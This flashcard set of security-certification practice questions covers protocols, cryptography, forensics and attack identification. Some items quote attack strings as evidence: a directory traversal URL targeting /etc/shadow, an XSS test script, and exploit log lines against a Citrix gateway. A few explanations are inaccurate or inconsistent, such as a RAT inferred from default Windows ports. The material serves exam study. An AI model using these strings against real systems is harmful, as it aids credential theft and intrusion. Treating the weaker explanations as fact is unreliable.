Dion practice tests Flashcards

1
Q

Which of the following protocols is commonly used to collect information about CPU utilization and memory usage from network devices?

SNMP
Netflow
MIB
SMTP

A

SNMP

OBJ-2.6: Simple Network Management Protocol (SNMP) is commonly used to gather information from routers, switches, and other network devices. It provides information about a device’s status, including CPU and memory utilization, as well as many other useful details about the device. NetFlow provides information about network traffic. A management information base (MIB) is a database used for managing the entities in a communication network. The Simple Mail Transfer Protocol (SMTP) is a communication protocol for electronic mail transmission.

2
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred?

SQL Injection
Directory traversal
XML injection
Buffer overflow

A

Directory traversal

OBJ-1.2: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. SQL injection is the placement of malicious code in SQL statements, via web page input.

3
Q

You are trying to find a rogue device on your wired network. Which of the following options would NOT be helpful in finding the device?

MAC validation
Site surveys
War walking
Port scanning

A

War walking

OBJ-1.4: War walking is conducted by walking around a building while trying to locate wireless networks and devices. War walking will not help find a wired rogue device. Checking valid MAC addresses against a known list, scanning for new systems or devices, and physically surveying for unexpected systems can be used to find rogue devices on a wired network.

4
Q

Which of the following does a User Agent request a resource from when conducting a SAML transaction?

Single sign-on (SSO)
Relying party (RP)
Identity provider (IdP)
Service provider (SP)

A

Service provider (SP)

OBJ-4.2: Security Assertion Markup Language (SAML) is an XML-based framework for exchanging security-related information such as user authentication, entitlement, and attributes. SAML is often used in conjunction with SOAP. SAML is a solution for providing single sign-on (SSO) and federated identity management. It allows a service provider (SP) to establish a trust relationship with an identity provider (IdP) so that the identity of a user (the principal) can be trusted by the SP without the user having to authenticate directly with the SP. The principal’s User Agent (typically a browser) requests a resource from the service provider (SP). The resource host can also be referred to as the relying party (RP). If the user agent does not already have a valid session, the SP redirects the user agent to the identity provider (IdP). The IdP requests the principal’s credentials if the principal is not already signed in and, if they are correct, provides a SAML response containing one or more assertions. The SP verifies the signature(s) and (if accepted) establishes a session and provides access to the resource.

5
Q

In an effort to increase the security of their passwords, Dion Training has added a salt and cryptographic hash to their passwords prior to storing them. To further increase security, they run this process many times before storing the passwords. What is this technique called?

Salting
Collision resistance
Key stretching
Rainbow table

A

Key stretching

OBJ-6.1: In cryptography, key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources it takes to test each possible key. The question describes one such key stretching technique.

6
Q

Alexa is an analyst for a large bank that has offices in multiple states. She wants to create an alert to detect when an employee from one bank office logs into a workstation located at an office in another state. What type of detection and analysis is Alexa configuring?

Anomaly​
Heuristic​
Behavior​
Trend

A

Behavior

OBJ-2.1: This is an example of behavior-based detection. Behavior-based detection (or statistical- or profile-based detection) means that the engine is trained to recognize baseline traffic or expected events associated with a user account or network device. Anything that deviates from this baseline (outside a defined level of tolerance) generates an alert. Heuristic analysis determines whether a number of observed data points constitutes an indicator and whether related indicators make up an incident; both judgments depend on a good understanding of the relationships between the observed indicators. Human analysts are typically good at interpreting context but work painfully slowly, in computer terms, and cannot hope to cope with the sheer volume of data and traffic generated by a typical network. Anomaly analysis is the process of defining an expected outcome or pattern for events and then identifying any events that do not follow these patterns. This is useful in tools and environments that enable you to set rules. Trend analysis is not used for detection, but instead to better understand capacity and the normal baseline of a system. Behavior-based detection differs from anomaly-based detection. Behavior-based detection records expected patterns in relation to the entity being monitored (in this case, user logins). Anomaly-based detection prescribes the baseline for expected patterns based on its own observation of what normal looks like.

7
Q

Which of the following is the LEAST secure wireless security and encryption protocol?

WPA
AES
WPA2
WEP

A

WEP

OBJ-6.3: Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. It is the oldest form of wireless security and the weakest form. WEP can be cracked with brute force techniques in less than 5 minutes with a normal end-user computer.

8
Q

Which of the following ports should you block at the firewall if you want to prevent a remote login to a server from occurring?

110
25
23
443

A

23

OBJ-2.6: Port 23 is used by telnet, which used to be used by administrators to connect remotely to a server and issue commands via a command-line interface. Telnet is not commonly used in networks anymore because all of the commands sent back and forth to the server are passed without any encryption or protection. Therefore, telnet is a security risk and has been mostly replaced by SSH (Port 22). Port 25 is used by SMTP, Port 110 is used by POP3, and port 443 is used by HTTPS.

9
Q

Vulnerability scans must be conducted on a continuous basis in order to meet regulatory compliance requirements for the storage of PHI. During the last vulnerability scan, a cybersecurity analyst received a report of 2,592 possible vulnerabilities and was asked by the Chief Information Security Officer (CISO) for a plan to remediate all the known issues. Which of the following should the analyst do next?

Wait to perform any additional scanning until the current list of vulnerabilities have been remediated fully.

Attempt to identify all the false positives and exceptions, then resolve any remaining items.

Place any assets that contain PHI in a sandbox environment and then remediate all the vulnerabilities.

Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first.

A

Filter the scan results to include only those items listed as critical in the asset inventory and remediate those vulnerabilities first

OBJ-5.8: PHI is an abbreviation for Personal Health Information. When attempting to remediate a large number of vulnerabilities, it is crucial to prioritize the vulnerabilities to determine which ones should be remediated first. In this case, there is a regulatory requirement to ensure the security of the PHI data. Therefore, those assets that are critical to the secure handling or storage of PHI carry the highest risk and should be prioritized for remediation first. It is impractical to resolve all 2,592 vulnerabilities at once. Therefore, you should not try to identify all the false positives and exceptions and then resolve any remaining items, since they won’t be prioritized for remediation. You should also not wait to perform additional scanning, because a scan is only a snapshot of your current status. If it takes 30 days to remediate all the vulnerabilities and you do not scan, new vulnerabilities may have been introduced during that time. Placing all the PHI assets into a sandbox will not work either, because then you have removed them from the production environment and they can no longer serve their critical business functions.

10
Q

You are working as part of a cyber incident response team. An ongoing attack has been identified on your webserver. Your company wants to take legal action against the criminals who have hacked your server, so they have brought in a forensic analyst from the FBI to collect the evidence from the server. What order should the digital evidence be collected based on the order of volatility?

Processor Cache, Random Access Memory, Swap File, Hard Drive or USB Drive

Swap File, Processor Cache, Random Access Memory, Hard Drive or USB Drive

Hard Drive or USB Drive, Swap File, Random Access Memory, Processor Cache

Processor Cache, Swap File, Random Access Memory, Hard Drive or USB Drive

A

Processor Cache, Random Access Memory, Swap File, Hard Drive or USB Drive

OBJ-5.5: The correct order for evidence collection based on the order of volatility is the Processor Cache, Random Access Memory, Swap File, and then the Hard Drive or USB Drive. Since the Processor Cache is the most volatile and changes the most frequently, it should be captured first. Random Access Memory (RAM) is temporary storage in a computer that can quickly change or be overwritten, and the information stored in RAM is lost when power is removed from the computer, so it should be collected second. Swap files are temporary files on a hard disk that are used as virtual memory, and therefore should be collected third. The files on a hard disk or USB drive are the least volatile of the four options presented, since that storage is used for long-term storage of data and its contents are not lost when the computer loses power.

11
Q
Which of the following ports should you block at the firewall if you want to prevent a remote login to a server from occurring?

80
22
21
143

A

22

OBJ-2.6: Port 22 is used for SSH, which is used by administrators to securely connect remotely to a server and issue commands via a command-line interface. Port 21 is used by FTP, Port 80 is used by HTTP, and port 143 is used by IMAP.

12
Q
You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the target of the attack?

443
3389
389
21

A

443

OBJ-2.6: Web-based attacks would likely appear on port 80 (HTTP) or port 443 (HTTPS). An attack against Active Directory is likely to be observed on port 389 LDAP. An attack on an FTP server is likely to be observed on port 21 (FTP). An attack using the remote desktop protocol would be observed on port 3389 (RDP).

13
Q

53 TFTP
69 SMTP
25 HTTP
80 DNS

Using the image provided, place the port numbers in the correct order with their associated protocols:

25, 80, 53, 69
69, 25, 80, 53
53, 69, 25, 80
80, 53, 69, 25

A

69, 25, 80, 53

OBJ-2.6: For the exam, you need to know your ports and protocols. The Trivial File Transfer Protocol (TFTP) uses port 69. The Simple Mail Transfer Protocol (SMTP) uses port 25. The Hypertext Transfer Protocol (HTTP) uses port 80. The Domain Name Service (DNS) protocol uses port 53.

14
Q
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?

Image of the server's SSD
ARP cache
L3 cache
Backup tapes

A

L3 cache

OBJ-5.5: When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first, and the least volatile (least likely to change) last. You should always begin the collection with the CPU registers and cache memory (L1/L2/L3/GPU). Next come the contents of system memory (RAM), including the routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. After that, you would move on to the collection of data storage devices like hard drives, SSDs, and flash memory devices. Finally, you would move on to less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.

15
Q
What type of malware changes its binary pattern in its code on specific dates or times in order to avoid detection by antimalware software?

Polymorphic virus
Ransomware
Logic bomb
Trojan

A

Polymorphic virus

OBJ-1.1: A polymorphic virus alters its binary code in order to avoid detection by antimalware scanners that rely on signature-based detection. By changing its signature, the virus can avoid detection.

16
Q

While conducting a penetration test of an organization’s web applications, you attempt to insert the following script into the search form on the company’s web site:

alert("This site is vulnerable to an attack!")

Then, you click the search button, and a pop-up box appears on your screen showing the following text, “This site is vulnerable to an attack!” Based on this response, what vulnerability have you uncovered in the web application?

Cross-site scripting
Cross-site request forgery
Distributed denial of service
Buffer overflow

A

Cross-site scripting

OBJ-1.2: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands: specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer.

17
Q

Which of the following cryptographic algorithms is classified as asymmetric?

DSA
DES
AES
RC4

A

DSA

OBJ-6.2: The Digital Signature Algorithm (DSA) is a Federal Information Processing Standard for digital signatures. The algorithm uses a key pair consisting of a public key and a private key. AES, RC4, and DES are all symmetric algorithms.

18
Q

Which of the following methods should a cybersecurity analyst use to locate any instances on the network where passwords are being sent in cleartext?

SIEM event log monitoring
Net flow capture
Full packet capture
Software design documentation review

A

Full packet capture

OBJ-2.1: Full packet capture records the complete payload of every packet crossing the network. The other methods will not provide sufficient information to allow for the detection of a cleartext password being sent. A net flow analysis will determine where communications occurred, by what protocol, to which devices, and how much content was sent, but it will not reveal anything about the content itself, since it only analyzes the metadata for each packet crossing the network. A SIEM event log being monitored might detect that an authentication event has occurred, but it will not necessarily reveal whether the password was sent in cleartext, as a hash value, or as ciphertext. Software design documentation may reveal what the designer’s intentions for authentication were when they created the application, but this only provides an ‘as designed’ view of a given piece of software and does not show whether the ‘as built’ configuration was implemented securely.

19
Q

Which of the following hashing algorithms results in a 256-bit fixed output?

SHA-1
NTLM
SHA-2
MD-5

A

SHA-2

OBJ-6.2: SHA-2 creates a 256-bit fixed output. SHA-1 creates a 160-bit fixed output. NTLM creates a 128-bit fixed output. MD-5 creates a 128-bit fixed output.

20
Q

You have been asked to develop a solution for one of your customers. The customer is a software development company, and they need to be able to test a wide variety of operating systems to test the software applications their company is developing internally. The company doesn’t want to buy a bunch of computers to install all of these operating systems for testing. Which of the following solutions would BEST meet the company’s requirements?

Purchase a high-end computer that has a lot of CPU cores and RAM, install a hypervisor, and configure a virtual machine for each operating system that will be used to test the applications being developed

Purchase multiple inexpensive workstations and install one operating system that will be used to test the applications being developed on each workstation

Purchase one computer, install an operating system on it, create an image of the system, then reformat it, install the next operating system, create another image, and reimage the machine each time you need to test a different application

Purchase multiple workstations, install a VM on each one, then install one operating system that will be used to test the applications being developed in each VM

A

Purchase a high-end computer that has a lot of CPU cores and RAM, install a hypervisor, and configure a virtual machine for each operating system that will be used to test the applications being developed

OBJ-3.7: Since the company’s main goal was to minimize the amount of hardware required, the BEST solution is to purchase a high-end computer that has a lot of CPU cores and RAM, install a hypervisor, and configure a virtual machine for each operating system that will be used to test the applications being developed. This allows a single machine to run multiple operating systems for testing with the least amount of hardware.

21
Q

Which of the following is NOT considered part of the Internet of Things?

Laptop
SCADA
Smart television
ICS

A

Laptop

OBJ-3.5: Supervisory control and data acquisition (SCADA) systems, industrial control systems (ICS), internet-connected televisions, thermostats, and many other things are examples of devices classified as the Internet of Things (IoT). A laptop would be better classified as a computer or host than as part of the Internet of Things. The Internet of Things (IoT) is a system of interrelated computing devices, mechanical and digital machines provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

22
Q

Susan, a help desk technician at Dion Training, has received several trouble tickets today related to employees receiving the same email as part of a phishing campaign. She has determined that the malicious link in the email is not being blocked by the company’s security suite when a user clicks the link. Susan asks you what action can be performed to prevent a user from reaching the website that is associated with the malicious link in the phishing email. What action do you recommend she utilize?

Block the IP address of the malicious domain in your firewall’s ACL

Add the malicious domain name to your content filter and web proxy’s blacklist

Forward this phishing email to all employees with a warning not to click on the embedded links

Enable TLS on your organization’s mail server

A

Add the malicious domain name to your content filter and web proxy’s blacklist

OBJ-2.3: To prevent a user from accessing the malicious website when the link is clicked, the malicious domain name should be added to the blacklist of the company’s content filter and web proxy. This will ensure that no devices on the network can reach the malicious domain name. While blocking the IP address associated with the domain name might help for a short period of time, the owner of the malicious domain could quickly redirect the DNS to point to a different IP, and then the users would still be able to access the malicious domain and its contents. Enabling TLS on the mail server will only encrypt the connection between the email server and its clients, but it will not prevent the users from clicking on the malicious link and accessing the malicious content. While informing the users that there is an active attempt at phishing being conducted against the organization is a good idea, forwarding the phishing email with the malicious link will generally cause more users to accidentally click on the malicious link, which further exacerbates the issue.

23
Q

Which of the following cryptographic algorithms is classified as symmetric?

ECC
RSA
Twofish
Diffie-Hellman

A

Twofish

OBJ-6.2: Twofish is a symmetric key block cipher with a block size of 128 bits and key sizes up to 256 bits. ECC, RSA, and Diffie-Hellman are all asymmetric algorithms.

24
Q

Riaan’s company runs critical web applications. During a vulnerability scan, Riaan found a serious SQL injection vulnerability in one of their web applications. The system cannot be taken offline to remediate the vulnerability. Which of the following compensating controls should Riaan recommend using until the system can be remediated?

WAF
IPS
Vulnerability scanning
Encryption

A

WAF

OBJ-3.2: A WAF (web application firewall) is the best option, since it can serve as a compensating control and can protect against web application vulnerabilities like an SQL injection until the application can be fully remediated. Vulnerability scanning could only be used to detect the issue. Therefore, it is a detective control, not a compensating control. Encryption would not be effective in stopping an SQL injection. An IPS is designed to protect network devices based on ports, protocols, and signatures. It would not be effective against an SQL injection and is not considered a compensating control for this vulnerability.

25
Q

Which of the following cryptographic algorithms is classified as asymmetric?

AES
RC4
DES
RSA

A

RSA

OBJ-6.2: RSA (Rivest–Shamir–Adleman) was one of the first public-key cryptosystems and is widely used for secure data transmission. As a public-key cryptosystem, it relies on an asymmetric algorithm. AES, RC4, and DES are all symmetric algorithms.

26
Q

What tool is used to collect wireless packet data?

Nessus
John the Ripper
Aircrack-ng
Netcat

A

Aircrack-ng

OBJ-2.2: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that includes monitoring, attacking, testing, and cracking of wireless networks. This includes packet capture and export of the data collected as a text file or pcap file. John the Ripper is a password cracking software tool. Nessus is a vulnerability scanner. Netcat is used to create a reverse shell from a victimized machine back to an attacker.

27
Q

You are attending a cybersecurity conference and just watched a security researcher demonstrating the exploitation of a web interface on a SCADA/ICS component. This caused the device to malfunction and be destroyed. You recognize that the same component is used throughout your company’s manufacturing plants. Which of the following mitigation strategies would provide you with the most immediate protection against this emergent threat?

Evaluate if the web interface must remain open for the system to function; if it isn’t needed, block the web interface

Replace the affected SCADA/ICS components with more secure models from a different manufacturer

Demand that the manufacturer of the component release a patch immediately and deploy the patch as soon as possible

Logically or physically isolate the SCADA/ICS component from the enterprise network

A

Evaluate if the web interface must remain open for the system to function; if it isn’t needed, block the web interface

OBJ-3.5: The most immediate protection against this emergent threat would be to block the web interface from being accessible over the network. Before doing this, though, you must evaluate whether the interface needs to remain open for the system to function properly. If it is not needed, you should block it to minimize the attack surface of the SCADA/ICS component. Ideally, your SCADA/ICS components should already be logically or physically isolated from the enterprise network. Since the question doesn’t mention the networks as an area of concern, we can assume they are already following the industry best practice of logical or physical segmentation between the SCADA/ICS network and the enterprise network. On the exam, make sure you focus on the question being asked. In this case, the question focuses on the web interface. Developing a patch can be a time-consuming process, therefore waiting for the manufacturer to provide a patch will not provide immediate protection to your components. The same holds true with replacing the affected components. Even if you could get the company to authorize the funding for such a purchase, it would take time to order, ship, receive, and install the new components. Additionally, you would cause unwanted downtime in the factory during the installation of the components, making it an ineffective option when simply blocking the web interface is free, quick, and effective.

28
Q

Review the network diagram provided. Which of the following ACL entries should be added to the firewall to allow only the Human Resources (HR) computer to have SMB access to the file server (Files)?

(Note: The firewall in this network is using implicit deny to maintain a higher level of security. ACL entries are in the format of Source IP, Destination IP, Port Number, TCP/UDP, Allow/Deny.)

Intranet Workstations      Data Center
Sales: 172.16.1.2          Backup: 192.168.1.10
HR: 172.16.1.3             Confidential: 192.168.1.11
IT: 172.16.1.4             Files: 192.168.1.12

172.16.1.3, 192.168.1.12, ANY, TCP, ALLOW
172.16.1.12/24, 192.168.1.3/24, 445, TCP, ALLOW
172.16.1.3, 192.168.1.12, 445, TCP, ALLOW
192.168.1.12, 172.16.1.3, 445, UDP, DENY

A

172.16.1.3, 192.168.1.12, 445, TCP, ALLOW

OBJ-2.1: The ACL should be created with 172.16.1.3 as the Source IP, 192.168.1.12 as the Destination IP, 445 as the port number operating over TCP, and the ALLOW condition set. This is the most restrictive option presented (only the HR workstation and the Files server are used), and the minimal number of ports are opened to accomplish our goal (only port 445 for the SMB service).

29
Q

You are working as a help desk technician and received a call from a user who is complaining that their computer’s performance has slowed down over the last week, since they installed a new free video game on the computer. As part of your troubleshooting efforts, you open the command prompt in Windows and run the following command:
c:\Windown\system32>netstat -anb
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0;0.0.0:0 Listening
TCP 0.0.0.0:445 0.0.0.0:0 Listening
TCP 10.10.10.123:51232 64.59.12.54:80 Established
UDP 10.10.10.123:53 .

Based on the output provided, what type of malware may have been installed on this user’s computer?

Worm
Spam
Keylogger
RAT

A

RAT

OBJ-1.1: Based on the scenario and the output provided, the best choice is a RAT. A RAT is a Remote Access Trojan, and it is usually installed accidentally by a user when they install free software on their machine that has a RAT embedded into it. The first two lines of the output show that ports 135 and 445 are open and listening for an inbound connection (which is typical of a RAT). This is not an example of a worm because the user admitted to installing a free program, and worms can install themselves and continue to send data outbound across the network to continue to spread. There is no indication in the scenario that a keylogger is being used, nor that spam (unsolicited emails) has been received.

30
Q

Which of the following formats do SAML transactions use when communicating information between the identity provider and the service provider?

CSV
JSON
HTML
XML

A

XML

OBJ-4.2: Security Assertion Markup Language (SAML) is an open standard that allows identity providers (IdP) to pass authorization credentials to service providers (SP). SAML transactions use Extensible Markup Language (XML) for standardized communications between the identity provider and service providers. SAML is the link between the authentication of a user’s identity and the authorization to use a service.

31
Q

A cybersecurity analyst is working at a college that wants to increase the security of its network by implementing vulnerability scans of centrally managed workstations, student laptops, and faculty laptops. Any proposed solution must be able to scale up and down as new students and faculty use the network. Additionally, the analyst wants to minimize the number of false positives to ensure accuracy in their results. The chosen solution must also be centrally-managed through an enterprise console. Which of the following scanning topologies would be BEST able to meet these requirements?

Passive scanning engine located at the core of the network infrastructure

Active scanning engine installed on the enterprise console

Combination of cloud-based and server-based scanning engines

Combination of server-based and agent-based scanning engines

A

Active scanning engine installed on the enterprise console

OBJ-2.2: Since the college wants to ensure there is a centrally-managed enterprise console, using an active scanning engine installed on the enterprise console would best meet these requirements. Then, the college’s cybersecurity analysts could perform scans on any devices that are connected to the network using the active scanning engine at the desired intervals. Agent-based scanning would be ineffective since the college cannot force the installation of the agents onto each of the personally owned devices brought in by the students or faculty. A cloud-based or server-based engine may be useful, but it won’t address the centrally-managed requirement. Passive scanning is less intrusive but is subject to a high number of false positives.

32
Q

A cybersecurity analyst is reviewing the logs of a Citrix NetScaler Gateway running on a FreeBSD 8.4 server and saw the following output:

10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT"
10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"
10.1.1.1 - - [10/Jan/2020:16:12:31 +0000] "POST /vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT"

What type of attack was most likely being attempted by the attacker?

XML injection
Directory traversal
SQL injection
Password spraying

A

Directory traversal

OBJ-1.2: A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. The example output provided comes from a remote code execution vulnerability being exploited in which a directory traversal is used to access the files. XML Injection is an attack technique used to manipulate or compromise the logic of an XML application or service. SQL injection is the placement of malicious code in SQL statements via web page input. Password spraying attempts to crack various users' passwords by attempting a compromised password against multiple user accounts.

33
Q

You have been investigating how a malicious actor was able to exfiltrate confidential data from a web server to a remote host. After an in-depth forensic review, you determine that the web server’s BIOS had been modified by the installation of a rootkit. After you remove the rootkit and reflash the BIOS to a known good image, what should you do in order to prevent the malicious actor from affecting the BIOS again?

Install a host-based IDS
Utilize secure boot
Install an anti-malware application
Utilize file integrity monitoring

A

Utilize secure boot

OBJ-3.3: Since you are trying to protect the BIOS, utilizing secure boot is the best choice. Secure boot is a security system offered by UEFI. It is designed to prevent a computer from being hijacked by a malicious OS. Under secure boot, UEFI is configured with digital certificates from valid OS vendors. The system firmware checks the operating system boot loader using the stored certificate to ensure that it has been digitally signed by the OS vendor. This prevents a boot loader that has been changed by malware (or an OS installed without authorization) from being used. The TPM can also be invoked to compare hashes of key system state data (boot firmware, boot loader, and OS kernel) to ensure they have not been tampered with by a rootkit. The other options are all good security practices, but they only apply once you have already booted into the operating system. This makes them ineffective against boot sector or rootkit attacks.

34
Q

What tool can be used as an exploitation framework during your penetration tests?

Metasploit
Nessus
Autopsy
Nmap

A

Metasploit

OBJ-1.4: The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Nessus is a very popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can be used to perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

35
Q

When your credit card data is written to the customer invoicing system at Dion Training, the first 12 digits are replaced with an x before storing the data. Which of the following privacy methods is being used?

Tokenization
Data minimization
Data masking
Anonymization

A

Data masking
OBJ-5.8: Data masking can mean that all or part of the contents of a field is redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. By reducing what information is collected, it reduces the amount and type of information that must be protected. Data anonymization is the process of removing personally identifiable information from a data set so that the people whom the data describe remain anonymous.

36
Q

A cybersecurity analyst has determined that an attack has occurred against your company's network. Fortunately, your company uses a good system of logging with a centralized syslog server, so all the logs are available, were collected, and have been stored properly. According to the cybersecurity analyst, the logs indicate that the database server was the only company server on the network that appears to have been attacked. The network is a critical production network for your organization. Therefore, you have been asked to choose the LEAST disruptive actions on the network while performing the appropriate incident response actions. Which actions do you recommend as part of the response efforts?

Isolate the affected server from the network immediately, format the database server, reinstall from a known good backup

Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server, and maintain the chain of custody

Immediately remove the database server from the network, create an image of its hard disk, and maintain the chain of custody

Conduct a system restore of the database server, image the hard drive, and maintain the chain of custody

A

Capture network traffic using a sniffer, schedule a period of downtime to image and remediate the affected server, and maintain the chain of custody

OBJ-5.4: Since the database server is part of a critical production network, it is important to work with the business to time the period of remediation to minimize productivity losses. You can immediately begin to capture network traffic since this won’t affect the database server or the network (least intrusive) while scheduling a period of downtime in which to take a forensic image of the database server’s hard drive. All network captures and the hard drive should be maintained under the chain of custody in case it is needed for criminal prosecution or civil action after remediation. The server should be remediated and brought back online once the hard drive image has been created.

37
Q

Which of the following is the MOST secure wireless security and encryption protocol?

WPA
WPS
WPA2
WEP

A

WPA2
OBJ-6.3: WPA2 is the most secure wireless security and encryption protocol. WPA2 uses a pre-shared key (PSK) for authentication and is designed to secure both home and enterprise wireless networks.

38
Q

An attacker is using the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?

request type=ns
set type=ns
locate type=ns
transfer type=ns

A

set type=ns
OBJ-2.2: The “set type=ns” tells nslookup to only report information on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

39
Q

[Image: a matching exercise listing the port numbers 161, 22, 23, 110 and the protocols SCP, POP3, SNMP, Telnet]

Using the image provided, place the port numbers in the correct order with their associated protocols:

23, 110, 22, 161
161, 22, 110, 23
22, 110, 161, 23
110, 161, 23, 22

A

22, 110, 161, 23
OBJ-2.6: For the exam, you need to know your ports and protocols. The Secure Copy Protocol (SCP) operates over port 22. Telnet operates over port 23. The Simple Network Management Protocol (SNMP) operates over port 161. The Post Office Protocol 3 (POP3) operates over port 110.

40
Q

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team is not able to log in or configure it. The IT team is concerned about the appliance receiving necessary updates. Which of the following mitigations should be performed to minimize the concern for the appliance and updates?

Configuration management
Vulnerability scanning
Automatic updates
Scan and patch the device

A

Vulnerability scanning
OBJ-3.3: The best option here is vulnerability scanning, as this allows the IT team to know what risks their network is taking on and where subsequent mitigations may be possible. Configuration management, automatic updates, and patching could be possible solutions in principle, but they are not viable options without gaining administrative access to the appliance. Therefore, it is best for the analyst to continue to conduct vulnerability scanning of the device to understand the risks associated with it, and then make recommendations to add compensating controls like firewall configurations, adding a WAF, providing segmentation, and other configurations outside the appliance to minimize the vulnerabilities it presents.

41
Q

Which type of media sanitization would you classify degaussing as?

Destruction
Erasing
Purging
Clearing

A

Purging
OBJ-5.7: Degaussing is classified as a form of purging. Purging renders information infeasible to recover even in a laboratory environment. Purging includes degaussing, encryption of the data with the destruction of its encryption key, and other non-destructive techniques. Some generic magnetic storage devices can be reused after the degaussing process has occurred, such as VHS tapes and some older backup tapes. For this reason, the technique of degaussing is classified as purging and not destruction, even though hard drives are rendered unusable after being degaussed. Clearing data prevents data from being retrieved without the use of state-of-the-art laboratory techniques. Clearing often involves overwriting data one or more times with repetitive or randomized data. Destroying data is designed not merely to render the information unrecoverable, but also to hinder any reuse of the media itself. Destruction is a physical process that may involve shredding media to pieces, disintegrating it to parts, pulverizing it to powder, or incinerating it to ash. Erasing or deleting is considered a normal operation of a computer, which removes the pointer to the data file on a storage device. Erasing and deleting are easily reversed, and the data can be recovered with commercially available or open-source tools.

42
Q

Which of the protocols listed is NOT likely to be a trigger for a vulnerability scan alert when it is used to support a virtual private network (VPN)?

PPTP
IPSec
SSLv3
SSLv2

A

IPSec
OBJ-2.1: IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, the use of PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

43
Q

Mantrap
Biometrics
Proximity badges
Remote wipe
Antivirus
Cable lock
ECC
GPS tracking
FM-200
Strong passwords

Select four security features that you should use to best protect your servers in the data center. This can include physical, logical, or administrative protections.

GPS tracking, Biometrics, Proximity badges, Remote wipe

FM-200, Biometric locks, Mantrap, Antivirus

Antivirus, Mantrap, Cable lock, GPS tracking

Strong passwords, Biometrics, Mantrap, Cable lock

A

FM-200, Biometric locks, Mantrap, Antivirus

OBJ-3.9: The best option based on your choices is FM-200, Biometric locks, Mantrap, and Antivirus. FM-200 is a fire extinguishing system that is commonly used in data centers and server rooms to protect the servers from fire. Biometric locks are often used in high-security areas as a lock on the access door. Additionally, biometric authentication could be used for a server by using a USB fingerprint reader. Mantraps are often used as part of securing a data center as well. This area creates a boundary between a lower security area (such as the offices) and the higher security area (the server room). Antivirus should be installed on servers since they can use signature-based scans to ensure files are safe before being executed.

44
Q

A small doctor's office has asked you to configure their network to use the highest levels of wireless security and desktop authentication. The office only uses cloud-based SaaS applications to store their patients' sensitive data. Which TWO of the following protocols or authentication methods should you implement for the BEST security?

WEP
RADIUS
WPS
WPA2
SSO
Multifactor

A

WPA2, Multifactor

OBJ-4.1: Since everything is being stored within a cloud-based SaaS application, the doctor’s office needs to ensure their network connection is using the highest level of encryption (WPA2), and their desktop authentication should use a multifactor authentication system. Multifactor authentication relies on using at least 2 of the following factors: something you know (password or pin), something you have (smart card or key fob), something you are (fingerprint or retinal scan), or something you do (draw a pattern or how you sign your name).

45
Q

You have been hired as a cybersecurity analyst for a privately-owned bank. Which of the following regulations would have the greatest impact on your bank’s cybersecurity program?

FERPA
SOX
GLBA
HIPAA

A

GLBA
